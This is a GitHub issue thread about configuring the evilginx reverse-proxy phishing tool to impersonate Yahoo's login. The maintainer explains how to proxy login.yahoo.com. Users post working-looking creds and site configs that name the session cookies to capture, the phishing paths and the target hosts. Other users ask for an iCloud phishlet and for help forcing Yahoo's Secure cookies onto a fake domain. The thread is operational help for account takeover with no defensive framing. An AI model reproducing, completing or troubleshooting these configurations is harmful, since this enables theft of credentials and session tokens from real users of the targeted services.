Closed agendasep closed 7 years ago
Yes, I can see the problem. To solve it you would have to create a new site .conf file for login.yahoo.com domain with similiar setup to correctly proxy requests to different domain.
This week I will be releasing a big update with more site templates. One of the templates handles the issue you described, so you will be able to see how its done.
It's worked!. Thank you so much.
Awesome! Happy to help!
Hi @kgretzky
I'm actually trying the same thing as sepehrrahami, and i'm stuck at the same point he was i guess!
The page is loading on my registred domain but when i enter anything the username field it says that i must enable cookie in order to login , i tried to make my login.yahoo.com.conf similar as the one you used for icloud template but i must be doing something wrong..
Could you point me in the right direction maybe ?
My yahoo.creds looks like this
[creds] email_arg=username passwd_arg=password tokens=[{"domain":".yahoo.com","cookies":["B", "F", "HP", "PH", "SSL", "T", "U", "Y", "YLS","CH", "FPCK2", "FPS", "fpc", "fpc_s", "fpl", "fpt"]},{"domain":".login.yahoo.com","cookies":["AS"]}]
and here is my config
[site] name=yahoo site_conf=["login.yahoo.com.conf"] creds_conf=yahoo.creds phish_subdomains=["www"] phish_paths=["/?.src","/account/challenge/password"] target_hosts=["login.yahoo.com","yahoo.com"] cookie_hosts=["login.yahoo.com","yahoo.com"] redir_arg=rc success_arg=rd log_name=evilginx-yahoo.log cert_subdomains=["www"]
Thanks and awesome work btw ;)
Hello do you have icloud phishlet? If yes then can you share?
hi, i am making a config for yahoo and have problem with set-cookies header. it is: set-cookie: AS=v=1&s=MGDmtRQc; path=/; domain=.login.yahoo.com; secure; HttpOnly and as you see it have secure flag. i think library can't change domain so it pass to browser with wrong domain and can't set in cookies storage (our fake domain is e.g: fakeyahoo.com). do you have any idea? thanks